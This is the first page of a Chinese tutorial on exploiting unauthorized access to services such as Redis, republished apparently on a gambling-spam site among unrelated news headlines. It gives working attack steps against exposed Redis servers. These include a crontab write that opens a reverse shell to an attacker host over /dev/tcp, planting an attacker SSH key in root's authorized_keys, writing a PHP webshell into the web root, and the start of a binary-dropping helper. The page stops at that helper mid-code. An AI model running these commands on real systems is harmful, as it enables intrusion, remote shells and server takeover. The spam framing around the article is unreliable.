太阳集团2138备用网址

  • 防弹少年团金泰亨蓝发登各国热搜 玩儿转红粉金黑棕各种发色实力演绎“有颜任性”【组图】 2019-04-25
  • 龙烨为袁竹逍遥画派配画诗欣赏之三 2019-04-25
  • 因应增值税下调 多个豪车品牌在华降价 2019-04-25
  • “小屏论”话两会:“习语”暖人心 2019-04-25
  • 低价 贴心 保障 国美3.15,为消费者保驾护航低价贴心保障 国美315,为消费者保驾护航-国美 2019-04-25
  • 中央政治局同志向党中央和习近平总书记述职 2019-04-25
  • China Daily Website 2019-04-25
  • 【守护好我们的美丽家园】新疆的明天一定会更好 2019-04-25
  • 22年后紫霞仙子归来 可至尊宝已经不是他了 2019-04-25
  • 【独家V观】你好 意大利 2019-04-25
  • 合肥一文化公司人去楼空老板跑路 老人购买保健品被骗上万元 2019-04-25
  • 北京二手房交易实现一网通办 20分钟就办完 ——凤凰网房产北京 2019-04-25
  • NBA史上最牛的9大名帅 波波在这里只能排倒三 2019-04-25
  • 《阿丽塔》要和《流浪地球》抢票房 2019-04-24
  • 百城住宅均价环比涨幅持续收窄 变化大多在1%内 2019-04-24
  • 欢迎来到 黑吧太阳集团2138备用网址 是业内专业的游戏平台,为你提供各式各样的精品游戏,最全的游戏项目,同时还为您提供各种游戏专题游戏攻略人气论坛。

    WIKI | 未授权访问的tips

    来源:本站整理 作者:佚名 时间:2019-02-25 TAG: 我要投稿

    太阳集团2138备用网址 www.r-island.com 前言
    知识那么多,大佬们学慢点,我营养跟不上啦! 前人栽树后人乘凉,本文主要是把一些资料依葫芦画瓢学习了下,做了个汇总.
    0x00 小二上酒
    https://github.com/se55i0n/DBScanner
    a)Redis未授权访问
    b)Jenkins未授权访问
    c)MongoDB未授权访问
    d)ZooKeeper未授权访问
    e)Elasticsearch未授权访问
    f)Memcache未授权访问
    g)Hadoop未授权访问
    h)CouchDB未授权访问
    i)Docker未授权访问
    0x01 Redis未授权访问
    1.扫描探测
    (1). 测试时建议 vim /etc/redis.conf
        (1)cp redis.conf ./src/redis.conf
        (2)bind 127.0.0.1前面加上##号注释掉 或者更改成 0.0.0.0
        (3)protected-mode设为no
        (4)启动redis-server  ------>   ./src/redis-server redis.conf
    (2). 攻击者喜欢的命令
        (1)查看信息:info
        (2)删除所有数据库内容:flushall
        (3)刷新数据库:flushdb
        (4)看所有键:KEYS *,使用select num可以查看键值数据。
        (5)设置变量:set test "who am i"
        (6)config set dir dirpath 设置路径等配置
        (7)config get dir/dbfilename 获取路径及数据配置信息
        (8)save保存
        (9)get 变量,查看变量名称
    (3). msf下利用模块
        auxiliary/scanner/redis/file_upload
        auxiliary/scanner/redis/redis_login
        auxiliary/scanner/redis/redis_server
    (4). nmap及获取信息


    匿名扫描脚本:https://xz.aliyun.com/t/528
    2.攻击的几种方法
    参考:http://www.cnblogs.com/xiaozi/p/7568272.htmlhttps://evi1cg.me/archives/hackredis.html
    (1).利用计划任务执行命令反弹shell
    在redis以root权限运行时可以写crontab来执行命令反弹shell先在自己的服务器上监听一个端口
    nc -lvnp 7999
    然后执行命令:
    root@kali:~## redis-cli -h 192.168.63.130
    192.168.63.130:6379> set x "\n* * * * * bash -i >& /dev/tcp/192.168.63.128/7999 0>&1\n"
    192.168.63.130:6379> config set dir /var/spool/cron/
    192.168.63.130:6379> config set dbfilename root
    192.168.63.130:6379> save
    ps:此处使用bash反弹shell,也可使用其他方法(2).写ssh-keygen公钥然后使用私钥登陆
    在以下条件下,可以利用此方法
    1、Redis服务使用ROOT账号启动
    2、服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。首先在本地生成一对密钥:
    root@kali:~/.ssh## ssh-keygen -t rsa
    然后redis执行命令:
    ssh-keygen -t rsa
    (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
    cat foo.txt | redis-cli -h x.x.x.x -x set crackit
    redis-cli -h x.x.x.x
         > config set dir /root/.ssh/
         > config get dir
         > config set dbfilename "authorized_keys"
         > save
    ssh -i id_rsa root@x.x.x.x
    或者如下
    192.168.63.130:6379> config set dir /root/.ssh/
    192.168.63.130:6379> config set dbfilename authorized_keys
    192.168.63.130:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKfxu58CbSzYFgd4BOjUyNSpbgpkzBHrEwH2/XD7rvaLFUzBIsciw9QoMS2ZPCbjO0IZL50Rro1478kguUuvQrv/RE/eHYgoav/k6OeyFtNQE4LYy5lezmOFKviUGgWtUrra407cGLgeorsAykL+lLExfaaG/d4TwrIj1sRz4/GeiWG6BZ8uQND9G+Vqbx/+zi3tRAz2PWBb45UXATQPvglwaNpGXVpI0dxV3j+kiaFyqjHAv541b/ElEdiaSadPjuW6iNGCRaTLHsQNToDgu92oAE2MLaEmOWuQz1gi90o6W1WfZfzmS8OJHX/GJBXAMgEgJhXRy2eRhSpbxaIVgx root@kali\n\n\n"
    192.168.63.130:6379> save
    (3).往web物理路径写webshell
    当redis权限不高时,并且服务器开着web服务,在redis有web目录写权限时,可以尝试往web路径写webshell
    192.168.63.130:6379> config set dir /var/www/html/
          192.168.63.130:6379> config set dbfilename shell.php
          192.168.63.130:6379> set x ""
          192.168.63.130:6379> save
    即可将shell写入web目录(web目录根据实际情况
    (4).写二进制文件,利用dns、icmp等协议上线(tcp协议不能出网)From:http://www.00theway.org/2017/03/27/redis_exp/写二进制文件跟前边有所不同,原因在于使用RDB方式备份redis数据库是默认情况下会对文件进行压缩,上传的二进制文件也会被压缩,而且文件前后存在脏数据,因此需要将默认压缩关闭,并且通过计划任务调用python清洗脏数据。
    local function hex2bin(hexstr)
        local str = ""
        for i = 1, string.len(hexstr) - 1, 2 do
            local doublebytestr = string.sub(hexstr, i, i+1);
            local n = tonumber(doublebytestr, 16);

    [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]  下一页

    【声明】:太阳集团2138备用网址(http://www.r-island.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@www.r-island.com,我们会在最短的时间内进行处理。
    • 最新更新
      • 相关阅读
        • 本类热门
          • 最近下载